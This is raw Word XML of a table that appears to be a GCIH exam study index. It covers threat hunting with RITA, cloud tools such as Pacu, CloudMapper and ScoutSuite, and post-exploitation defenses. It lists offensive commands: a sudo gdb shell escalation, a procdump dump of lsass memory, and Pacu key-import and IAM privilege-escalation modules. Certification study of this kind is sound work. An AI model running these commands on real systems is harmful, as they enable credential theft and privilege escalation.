                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4638E5" w14:textId="402FD31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0C5E5249" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10860850" w14:textId="6239FB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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F99A0B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02974C3A" w14:textId="05C253B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6410C3B3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="54577D38" w14:textId="76C3D1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RITA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B1DD90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Use statistical threat identification to analyze data over time for threat hunting, used for offline network activity assessment (reads from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Zeek</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> logging data).  Works best with data over one or more days</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6BB199" w14:textId="231CD6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0FC40209" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7230A56E" w14:textId="514407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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03224B59" w14:textId="4A3B2C4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6358D0F7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D8EDF05" w14:textId="39F0BD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5848A090" w14:textId="5B1F90B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23AC330" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615585FF" w14:textId="63A1DB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Long Connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2902618D" w14:textId="244B087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show-long-connection -H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5B6536DD" w14:textId="65008BC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6AD651FD" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735ED0AA" w14:textId="537CB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show-exploded-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dns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73B86D63" w14:textId="60FF71C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0ECA18C5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1439AB" w14:textId="72C792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config.yaml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AD8C5C" w14:textId="42BD2F1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293D8AA4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A24F65C" w14:textId="6D531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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26874BD3" w14:textId="6EC393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1019B1E2" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FC78A4" w14:textId="561FB5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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3A6820" w14:textId="5FFD12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E6E1365" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C9DB81" w14:textId="197E6B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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCC9D90" w14:textId="0ABA88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594C73A7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0FEAFCDC" w14:textId="21DFEA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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:ind w:right="1748"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo -l  sudo gdb -q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F33E71" w14:textId="58EF19A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shell  id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AF4992" w14:textId="311330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9A63BAE" w14:textId="02C2C0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1053EC71" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="64FDA7A8" w14:textId="262DC4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.\procdump64.exe -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>accepteula</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ma lsass.exe </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lsass.dmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4632DFBA" w14:textId="482A1A1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2250A843" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA2700E" w14:textId="44E8903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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B1D474" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19303A4A" w14:textId="12387FE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64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="367C8BD7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0B53C419" w14:textId="28F158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2075A4CB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630D90A5" w14:textId="4DE9CE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Visual Summary: Data Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A72E61B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44F25D52" w14:textId="31550B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7308A3F8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2E044B" w14:textId="5E6AB9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/credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1390B4A2" w14:textId="26A6DE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1949CAA7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D874E31" w14:textId="3F5BAF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sts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> get-caller-identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4385936D" w14:textId="6ABB6C5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651498F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF03339" w14:textId="3B611F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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A745D3F" w14:textId="33395A7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2CDB0D2C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="177FAE72" w14:textId="180514E2"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Pacu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: AWS Interrogation and Attack Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE46C8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./cli.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1854076F" w14:textId="43E621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import_keys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jmerckle</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iam_enum_permission</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iam_privesc_scan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AADF3C1" w14:textId="3A4F8A6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2C93A6A4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A950AE7" w14:textId="15FEEA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gcloud</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instance_list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D1BE1F" w14:textId="187D53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0A05037C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="376CA218" w14:textId="6F7EFB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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736EE3D7" w14:textId="1B01FD4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4B06C01" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D63746D" w14:textId="7595273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Post-Exploitation Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7673A5" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3F6DD0" w14:textId="365D9C0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0EC8AA70" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2C3EE6" w14:textId="760F60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AWS: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CloudMapper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F75E3E8" w14:textId="1FB34F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cloudmapper.py prepare --config </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>config.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --account </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>acctname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B519C4" w14:textId="403784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469B5B2E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433F49C7" w14:textId="46FF568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ScoutSuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (AWS, GCP, Azure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFE2EE2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B597AE7" w14:textId="2CD843B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C4B6CDF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5105DC63" w14:textId="4CA75C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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CCEFEF" w14:textId="7FAAA87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4FCE90A7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249C8C04" w14:textId="4B9369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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33784BBF" w14:textId="510E7131"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10D6B1F6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429047E3" w14:textId="430EF0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Where To Go From Here</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3422948D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA9AAD5" w14:textId="32193E0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55F21DF0" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033EEA9C" w14:textId="2F33C8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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654538E3" w14:textId="0D6DEC4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6ACDB87B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4473645E" w14:textId="709B1F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Spaced Repetition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DE3E5F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0B7C47" w14:textId="4D0E808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649A3BCF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="712B4250" w14:textId="210A8FD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC05097" w14:textId="4065132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5A625067" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF556E2" w14:textId="77C0EFC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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F703D4" w14:textId="009DB3A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4E799FA8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08B3633A" w14:textId="3FBC7A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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405E5F27" w14:textId="3D014B9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05375523" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AEED1AA" w14:textId="3CA97B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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B56B498" w14:textId="75BD650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38B36002" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C9CAB9" w14:textId="4CFF4F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GCIH Practical Exam: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CyberLive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7672FF15" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
